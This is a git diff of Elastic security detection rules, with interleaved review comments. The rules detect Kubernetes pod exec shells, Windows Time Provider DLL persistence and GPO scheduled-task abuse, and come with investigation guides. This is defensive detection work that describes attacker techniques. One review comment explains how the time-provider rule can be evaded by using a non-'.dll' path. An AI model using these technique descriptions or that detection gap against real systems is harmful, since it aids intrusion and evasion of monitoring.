 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json
index 89eb50bf9e8..83fa245408d 100644
--- a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json
+++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json
new file mode 100644
index 00000000000..113c49d7b3b
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_203.json
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects a user attempt to establish a shell session into a pod using the 'exec' command. Using the 'exec' command in a pod allows a user to establish a temporary shell session and execute any process/commands in the pod. An adversary may call bash to gain a persistent interactive shell which will allow access to any data the pod has permissions to, including secrets.", + "false_positives": [ + "An administrator may need to exec into a pod for a legitimate reason like debugging purposes. Containers built from Linux and Windows OS images, tend to include debugging utilities. In this case, an admin may choose to run commands inside a specific container with kubectl exec ${POD_NAME} -c ${CONTAINER_NAME} -- ${CMD} ${ARG1} ${ARG2} ... ${ARGN}. For example, the following command can be used to look at logs from a running Cassandra pod: kubectl exec cassandra --cat /var/log/cassandra/system.log . Additionally, the -i and -t arguments might be used to run a shell connected to the terminal: kubectl exec -i -t cassandra -- sh" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes User Exec into Pod", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.objectRef.subresource:\"exec\"\n", + "references": [ + "https://kubernetes.io/docs/tasks/debug/debug-application/debug-running-pod/", + "https://kubernetes.io/docs/tasks/debug/debug-application/get-shell-running-container/" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": 
"kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.subresource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14de811c-d60f-11ec-9fd7-f661ea17fbce", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1609", + "name": "Container Administration Command", + "reference": "https://attack.mitre.org/techniques/T1609/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "14de811c-d60f-11ec-9fd7-f661ea17fbce_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json index f6b073d1368..f2915acf69f 100644 --- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
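Review bot: The `false_positives` text in the new `_203.json` gives the example as `kubectl exec cassandra --cat /var/log/cassandra/system.log`, which as written passes an unknown `--cat` flag rather than separating the command from the pod name; it should read `kubectl exec cassandra -- cat /var/log/cassandra/system.log`, matching the `-- ${CMD}` form used earlier in the same sentence. The `note` field is also an empty string, so an exec-into-pod alert ships with no triage guidance; a short guide directing the analyst to the requesting user, the target namespace and pod recorded in the audit event, and to whether the access was approved under change management would bring this rule in line with the other rules in the package. Both are documentation-only changes to the rule's text fields.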
diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json
index 746c1f0ccfa..88b07ee351c 100644
--- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_103.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json
index df451e7d6cb..a7af6b143e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json
index 44756d4a656..63110618610 100644
--- a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_105.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json
new file mode 100644
index 00000000000..f8f634ea3d6
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106.json
@@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore Time Provider settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\W32Time\\\\TimeProviders\\\\*\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://pentestlab.blog/2019/10/22/persistence-time-providers/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } 
+ ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.003", + "name": "Time Providers", + "reference": "https://attack.mitre.org/techniques/T1547/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json index 1ab87f59278..a179375ad96 100644 --- a/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1542fa53-955e-4330-8e4d-b2d812adeb5f_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json index 10453a35f8a..49615843fc7 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_105.json 
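Review bot: In the new `_106.json` the query's final filter `registry.data.strings:"*.dll"` keys on the written value's file extension rather than on which value was written, so a time-provider module registered under a path without that suffix is not covered; W32Time loads whatever path the provider's `DllName` value holds, and the loader does not require a `.dll` extension. Scoping on the value name, e.g. `registry.value : "DllName"` (ECS `registry.value`), possibly alongside the existing data filter, would tie the rule to the setting that actually matters; worth confirming against what Elastic Defend and Endgame populate for registry events before relying on it. The investigation guide in `note` could then also tell the analyst that the `DllName` value of the affected `TimeProviders` subkey is the artifact to retrieve, since it currently says only "Retrieve the DLL".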
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 
detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "host.os.type:windows and\n(event.code: \"5136\" and 
winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
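Review bot: The new side of `note` in this hunk has lost text: `\u003cGPOPath\u003e` became nothing, leaving the path as `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`, and the "check the ... XML tags" sentence now has two empty inline-code spans where `<Command>` and `<Arguments>` stood, so the analyst is no longer told which tags to inspect. It looks like the unescaped `<...>` was then dropped as markup by whatever re-serialized these files, which is worth confirming in the generator, because the `@@ -12,7 +12,7 @@` hunks of the `_106.json` and `_107.json` versions of this rule in this diff show the same loss. JSON accepts a literal `<`, so the three spans should read `<GPOPath>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`, `<Command>` and `<Arguments>` on the new side, and the rest of the package should be checked for any `\u003c` that did not simply become `<`.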
@@ -75,7 +75,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
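Review bot: Both `setup` paragraphs on the new side still read "Steps to implement the logging policy with with Advanced Audit Configuration", and since the line is being rewritten anyway the doubled word should go: `Steps to implement the logging policy with Advanced Audit Configuration:`. The same string appears in the `@@ -70,7 +70,7 @@` `setup` hunks of the `_106.json` and `_107.json` versions of this rule in this diff.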
diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json index 60a5b8164e2..a57e03214b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_106.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 
detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "(event.code: \"5136\" and 
winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
@@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", - "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json index d2d78ee5c2e..1d3a38459f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/15a8ba77-1c13-4274-88fe-6bd14133861e_107.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `\u003cGPOPath\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml` file.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to 
